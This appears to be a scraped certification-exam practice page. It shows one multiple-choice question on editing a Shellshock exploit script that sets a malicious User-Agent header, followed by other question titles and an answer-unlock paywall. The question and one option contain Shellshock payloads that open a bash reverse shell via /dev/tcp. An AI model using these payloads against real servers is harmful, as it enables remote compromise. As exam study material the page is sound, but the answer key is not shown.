A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A) exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B) exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
C) exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D) exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Correct Answer:
Verified
Q45: User credentials were captured from a database
Q46: An Nmap network scan has found five
Q47: A penetration tester discovers that a web
Q48: A penetration tester discovered a vulnerability that
Q49: A large client wants a penetration tester
Q51: Which of the following should a penetration
Q52: A penetration tester conducted a vulnerability scan
Q53: Running a vulnerability scanner on a hybrid
Q54: A penetration tester runs the unshadow command
Q55: A penetration tester performs the following command:
Unlock this Answer For Free Now!
View this answer and more for free by performing one of the following actions
Scan the QR code to install the App and get 2 free unlocks
Unlock quizzes for free by uploading documents